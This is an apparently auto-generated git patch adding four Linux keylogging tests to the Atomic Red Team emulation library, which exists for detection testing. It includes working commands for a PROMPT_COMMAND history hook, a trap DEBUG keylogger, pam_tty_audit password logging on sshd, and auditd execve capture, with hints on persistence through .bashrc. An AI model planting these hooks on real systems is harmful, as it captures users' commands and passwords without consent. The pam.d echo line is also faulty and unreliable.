From 9f9d549bf5b450fa25c1c4901babc5fbcf6be974 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 27 Aug 2021 15:36:59 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 8 + atomics/Indexes/Indexes-CSV/linux-index.csv | 8 + atomics/Indexes/Indexes-Markdown/index.md | 8 + .../Indexes/Indexes-Markdown/linux-index.md | 8 + atomics/Indexes/index.yaml | 284 ++++++++++++++++++ atomics/T1056.001/T1056.001.md | 221 ++++++++++++++ 6 files changed, 537 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 48fab1bd..d4fe89f6 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -32,6 +32,10 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh +credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh +credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt +credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt +credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt @@ -109,6 +113,10 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password, collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh +collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh +collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt +collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt +collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index a87b19bb..539fcfdf 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -8,6 +8,10 @@ credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From L credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh +credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh +credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt +credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt +credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell @@ -26,6 +30,10 @@ collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single F collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh +collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh +collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt +collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt +collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f02535b2..441c083d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -59,6 +59,10 @@ - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #1: Input Capture [windows] - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] + - Atomic Test #3: Logging bash history to syslog [linux] + - Atomic Test #4: Bash session based keylogger [linux] + - Atomic Test #5: SSHD PAM keylogger [linux] + - Atomic Test #6: Auditd keylogger [linux] - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md) - Atomic Test #1: Dumping LSA Secrets [windows] @@ -189,6 +193,10 @@ - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #1: Input Capture [windows] - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] + - Atomic Test #3: Logging bash history to syslog [linux] + - Atomic Test #4: Bash session based keylogger [linux] + - Atomic Test #5: SSHD PAM keylogger [linux] + - Atomic Test #6: Auditd keylogger [linux] - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #1: Stage data from Discovery.bat [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index d8878c2a..6d926267 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -23,6 +23,10 @@ - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] + - Atomic Test #3: Logging bash history to syslog [linux] + - Atomic Test #4: Bash session based keylogger [linux] + - Atomic Test #5: SSHD PAM keylogger [linux] + - Atomic Test #6: Auditd keylogger [linux] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -83,6 +87,10 @@ - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] + - Atomic Test #3: Logging bash history to syslog [linux] + - Atomic Test #4: Bash session based keylogger [linux] + - Atomic Test #5: SSHD PAM keylogger [linux] + - Atomic Test #6: Auditd keylogger [linux] - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 93d419bd..0f807a6d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2688,6 +2688,148 @@ credential-access: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true + - name: Logging bash history to syslog + auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .bashrc + or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + +' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + executor: + name: sh + elevation_required: true + command: | + PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' + echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" + tail /var/log/syslog + cleanup_command: 'unset PROMPT_COMMAND + +' + - name: Bash session based keylogger + auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 + description: "When a command is executed in bash, the BASH_COMMAND variable + contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\". + The trap command is not a external command, but a built-in function of bash + and can be used in a script to run a bash function when some event occurs. + trap will detect when the BASH_COMMAND variable value changes and then pipe + that value into a file, creating a bash session based keylogger. \n\nTo gain + persistence the command could be added to the users .bashrc or .bash_aliases + or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell + +' + prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** + Bash not running! *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + name: output_file + description: File to store captured commands + type: String + default: "/tmp/.keyboard.log" + executor: + name: command_prompt + elevation_required: false + command: | + trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG + echo "Hello World!" + cat #{output_file} + cleanup_command: 'rm #{output_file} + +' + - name: SSHD PAM keylogger + auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca + description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. + The Linux audit tool auditd can use the pam_tty_audit module to enable auditing + of TTY input and capture all keystrokes in a ssh session and place them in + the /var/log/audit/audit.log file after the session closes. + +' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + input_arguments: + user_account: + description: Basic ssh user account for testing. + type: string + default: ubuntu + executor: + name: command_prompt + elevation_required: true + command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so + disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl + restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" + cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ + +' + - name: Auditd keylogger + auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af + description: "The linux audit tool auditd can be used to capture 32 and 64 bit + command execution and place the command in the /var/log/audit/audit.log audit + log. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** + auditd NOT installed *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + description: description + type: type + default: default + executor: + name: command_prompt + elevation_required: true + command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl + -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start + $(date +\"%d/%m/%y %H:%M:%S\") \n" + cleanup_command: 'systemctl restart auditd + +' T1557.001: technique: external_references: @@ -8325,6 +8467,148 @@ collection: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true + - name: Logging bash history to syslog + auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .bashrc + or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + +' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + executor: + name: sh + elevation_required: true + command: | + PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' + echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" + tail /var/log/syslog + cleanup_command: 'unset PROMPT_COMMAND + +' + - name: Bash session based keylogger + auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 + description: "When a command is executed in bash, the BASH_COMMAND variable + contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\". + The trap command is not a external command, but a built-in function of bash + and can be used in a script to run a bash function when some event occurs. + trap will detect when the BASH_COMMAND variable value changes and then pipe + that value into a file, creating a bash session based keylogger. \n\nTo gain + persistence the command could be added to the users .bashrc or .bash_aliases + or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell + +' + prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** + Bash not running! *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + name: output_file + description: File to store captured commands + type: String + default: "/tmp/.keyboard.log" + executor: + name: command_prompt + elevation_required: false + command: | + trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG + echo "Hello World!" + cat #{output_file} + cleanup_command: 'rm #{output_file} + +' + - name: SSHD PAM keylogger + auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca + description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. + The Linux audit tool auditd can use the pam_tty_audit module to enable auditing + of TTY input and capture all keystrokes in a ssh session and place them in + the /var/log/audit/audit.log file after the session closes. + +' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + input_arguments: + user_account: + description: Basic ssh user account for testing. + type: string + default: ubuntu + executor: + name: command_prompt + elevation_required: true + command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so + disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl + restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" + cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ + +' + - name: Auditd keylogger + auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af + description: "The linux audit tool auditd can be used to capture 32 and 64 bit + command execution and place the command in the /var/log/audit/audit.log audit + log. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** + auditd NOT installed *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + description: description + type: type + default: default + executor: + name: command_prompt + elevation_required: true + command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl + -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start + $(date +\"%d/%m/%y %H:%M:%S\") \n" + cleanup_command: 'systemctl restart auditd + +' T1557.001: technique: external_references: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index 88c11054..72a6bc3e 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -16,6 +16,14 @@ Keylogging is the most prevalent type of input capture, with many different ways - [Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d](#atomic-test-2---living-off-the-land-terminal-input-capture-on-linux-with-pamd) +- [Atomic Test #3 - Logging bash history to syslog](#atomic-test-3---logging-bash-history-to-syslog) + +- [Atomic Test #4 - Bash session based keylogger](#atomic-test-4---bash-session-based-keylogger) + +- [Atomic Test #5 - SSHD PAM keylogger](#atomic-test-5---sshd-pam-keylogger) + +- [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger) +
@@ -107,4 +115,217 @@ echo "Sorry, you must install module pam_tty_audit.so and recompile, for this te +
+
+ +## Atomic Test #3 - Logging bash history to syslog +There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. + +To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 + + + + + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' +echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" +tail /var/log/syslog +``` + +#### Cleanup Commands: +```sh +unset PROMPT_COMMAND +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires to be run in a bash shell and that logger and tee are installed. +##### Check Prereq Commands: +```sh +if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi +if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi +if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + + +
+
+ +## Atomic Test #4 - Bash session based keylogger +When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. + +To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to store captured commands | String | /tmp/.keyboard.log| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG +echo "Hello World!" +cat #{output_file} +``` + +#### Cleanup Commands: +```cmd +rm #{output_file} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires to be run in a bash shell +##### Check Prereq Commands: +```sh +if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + + +
+
+ +## Atomic Test #5 - SSHD PAM keylogger +Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 81d7d2ad-d644-4b6a-bea7-28ffe43becca + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user_account | Basic ssh user account for testing. | string | ubuntu| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +cp -v /etc/pam.d/sshd /tmp/ +echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" +systemctl restart sshd +systemctl restart auditd +ssh #{user_account}@localhost +whoami +sudo su +whoami +exit +exit +``` + +#### Cleanup Commands: +```cmd +cp -fv /tmp/sshd /etc/pam.d/ +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires sshd and auditd +##### Check Prereq Commands: +```sh +if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi +if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + + +
+
+ +## Atomic Test #6 - Auditd keylogger +The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. + +**Supported Platforms:** Linux + + +**auto_generated_guid:** a668edb9-334e-48eb-8c2e-5413a40867af + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | description | type | default| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +auditctl -a always,exit -F arch=b64 -S execve -k CMDS +auditctl -a always,exit -F arch=b32 -S execve -k CMDS +whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") +``` + +#### Cleanup Commands: +```cmd +systemctl restart auditd +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires sshd and auditd +##### Check Prereq Commands: +```sh +if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + +